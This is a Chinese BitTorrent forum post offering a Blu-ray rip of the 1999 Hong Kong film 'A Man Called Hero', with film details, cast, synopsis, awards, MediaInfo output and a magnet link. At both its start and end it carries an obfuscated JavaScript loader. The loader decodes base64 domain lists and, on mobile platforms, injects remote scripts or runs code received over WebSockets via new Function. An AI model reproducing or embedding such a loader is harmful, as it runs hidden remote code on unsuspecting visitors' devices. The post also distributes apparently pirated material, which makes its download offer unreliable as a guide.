中华英雄[国粤语配音/中文字幕].A.Man.Called.Hero.1999.1080p.BluRay.x265.10bit.DTS.2Audio 6.09GB

版主小s 1月前 259

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 中华英雄 / 华英雄 / A Man Called Hero

◎片 名 中華英雄

◎年 代 1999

◎产 地 中国香港 / 中国大陆

◎类 别 剧情 / 动作 / 冒险

◎语 言 粤语

◎上映日期 1999-07-17(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0203672/

◎豆瓣评分 6.5/10 (54539人评价)

◎豆瓣链接 https://movie.douban.com/subject/1294671/

◎片 长 116分钟(日本)

◎导 演 刘伟强 Andrew Lau (id:1106979)

◎编 剧 文隽 Manfred Wong (id:1274823)

马荣成 Wing Shing Ma (id:1322144)

◎演 员 郑伊健 Ekin Cheng (id:1031793)

舒淇 Qi Shu (id:1138320)

杨恭如 Kristy Yang (id:1016866)

元彪 Biao Yuen (id:1163752)

林晓峰 Jerry Lamb (id:1029805)

谢霆锋 Nicholas Tse (id:1050053)

吴镇宇 Francis Ng (id:1037098)

黄秋生 Anthony Wong Chau-Sang (id:1050076)

徐锦江 Elvis Tsui (id:1028828)

郑浩南 Mark Cheng (id:1028605)

李灿森 Sam Lee (id:1028522)

叶佩雯 Grace Yip (id:1005971)

陈小春 Jordan Chan (id:1075760)

郑佩佩 Pei-pei Cheng (id:1037023)

裘德·普瓦耶 Jude Poyer (id:1384164)

林志泰 Chi Tai Lam (id:1433961)

何润东 Peter Ho (id:1050590)

袁伟豪 Benjamin Yuen (id:1043737)

林迪安 Dion Lam (id:1289289)

黄斌 Ronald Wong (id:1301199)

卢惠光 Ken Lo (id:1032633)

吴志雄 Chi Hung Ng (id:1316796)

黄斌 Ronald Wong (id:1301199)

朱家欣 John Chu (id:1377137)

利碧君 Pik Kwan Lee (id:1289693)

刘静仪 Sylvia Liu (id:1290178)

林迪安 Dion Lam (id:1289289)

林迪安 Dion Lam (id:1289289)

曾景祥 Kinson Tsang (id:1299575)

罗颂华 Law Chung Wa (id:1388719)

黄志明 Wong Chi-Ming (id:1398895)

◎标 签 香港 / 动作 / 武侠 / 漫画改编 / 1999 / 中国 / 奇幻 / 魔幻

◎简 介

1913年,钱无义(徐锦江 饰)带了洋人来夺家传之宝,华家人惨遭灭门。华英雄(郑伊健 饰)在怒火中杀光洋人。他忍痛与妻子洁瑜(杨恭如 饰)暂别,远避美国当苦工谋生,却承受着种族歧视的不公待遇,华英雄反抗出走。

洁瑜带着身孕赴美,得中华楼老板元武(元彪 饰)相助,而英雄也被鬼仆救 出,夫妻相聚。洁瑜诞下龙凤双胞胎之夜,中华楼遭“五术人”纵火,洁瑜身亡,女婴被掳走,男婴被好友生奴(林晓峰 饰)收养。华英雄为了报仇,苦练师父金傲(黄秋生饰)的《中华傲决》武功。十六年后,华英雄之子华剑雄(谢霆峰 饰)欲寻生父,但华英雄以“天煞狐星”为由,不肯亲近儿子,最终在纽约自由女神像上,与仇人“五术人”的师父无敌(吴镇宇 饰)决斗……

◎获奖情况 (共8项)

第36届台北金马影展 (1999)

金马奖 最佳动作设计(提名)

└──林迪安 (id:1289289)

金马奖 最佳剪辑(提名)

└──彭发 (id:1293885)

金马奖 最佳视觉效果

第19届香港电影金像奖 (2000)

最佳服装造型设计(提名)

└──利碧君 (id:1289693)

最佳动作设计(提名)

└──林迪安 (id:1289289)

最佳原创电影音乐(提名)

└──陈光荣 (id:1019903)

最佳原创电影歌曲(提名)

最佳音响效果(提名)

└──曾景祥 (id:1299575)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 302749196246659483768550061127302972216 (0xE3C35FD018E0942CCF7117AEE8850338)

  4. Complete name : [email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.09 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 7 519 kb/s

  11. Encoded date : UTC 2021-10-27 15:31:37

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 55 min

  21. Bit rate : 5 348 kb/s

  22. Width : 1 916 pixels

  23. Height : 818 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.142

  31. Stream size : 4.33 GiB (71%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=21.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x818 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 55 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 510 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.22 GiB (20%)

  51. Title : Cantonese

  52. Language : Chinese

  53. Default : Yes

  54. Forced : No


  55. Audio #2

  56. ID : 3

  57. Format : FLAC

  58. Format/Info : Free Lossless Audio Codec

  59. Codec ID : A_FLAC

  60. Duration : 1 h 55 min

  61. Bit rate mode : Variable

  62. Bit rate : 635 kb/s

  63. Channel(s) : 2 channels

  64. Channel layout : L R

  65. Sampling rate : 48.0 kHz

  66. Frame rate : 11.719 FPS (4096 SPF)

  67. Bit depth : 16 bits

  68. Compression mode : Lossless

  69. Stream size : 526 MiB (8%)

  70. Title : Mandarin

  71. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  72. Language : Chinese

  73. Default : No

  74. Forced : No


  75. Text #1

  76. ID : 4

  77. ID in the original source medium : 4609 (0x1201)

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 1 h 52 min

  83. Bit rate : 23.4 kb/s

  84. Count of elements : 1605

  85. Stream size : 18.8 MiB (0%)

  86. Title : chs

  87. Language : Chinese

  88. Default : Yes

  89. Forced : No

  90. Original source medium : Blu-ray


  91. Text #2

  92. ID : 5

  93. ID in the original source medium : 4608 (0x1200)

  94. Format : PGS

  95. Muxing mode : zlib

  96. Codec ID : S_HDMV/PGS

  97. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration : 1 h 50 min

  99. Bit rate : 24.2 kb/s

  100. Count of elements : 1595

  101. Stream size : 19.1 MiB (0%)

  102. Title : cht

  103. Language : Chinese

  104. Default : No

  105. Forced : No

  106. Original source medium : Blu-ray


  107. Text #3

  108. ID : 6

  109. ID in the original source medium : 4610 (0x1202)

  110. Format : PGS

  111. Muxing mode : zlib

  112. Codec ID : S_HDMV/PGS

  113. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  114. Duration : 1 h 52 min

  115. Bit rate : 26.3 kb/s

  116. Count of elements : 1601

  117. Stream size : 21.1 MiB (0%)

  118. Title : eng

  119. Language : English

  120. Default : No

  121. Forced : No

  122. Original source medium : Blu-ray


  123. Menu

  124. 00:00:00.000 : en:Chapter 01

  125. 00:09:48.291 : en:Chapter 02

  126. 00:21:11.583 : en:Chapter 03

  127. 00:28:29.583 : en:Chapter 04

  128. 00:38:28.000 : en:Chapter 05

  129. 00:48:41.875 : en:Chapter 06

  130. 00:58:21.291 : en:Chapter 07

  131. 01:08:00.750 : en:Chapter 08

  132. 01:19:56.541 : en:Chapter 09

  133. 01:26:50.625 : en:Chapter 10

  134. 01:37:09.375 : en:Chapter 11

  135. 01:46:49.708 : en:Chapter 12




复制代码


TAGS 动作 冒险 剧情

磁力链:
  • magnet:?xt=urn:btih:D74024A2C57D03F380033F599C60F1052E77EA7A

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};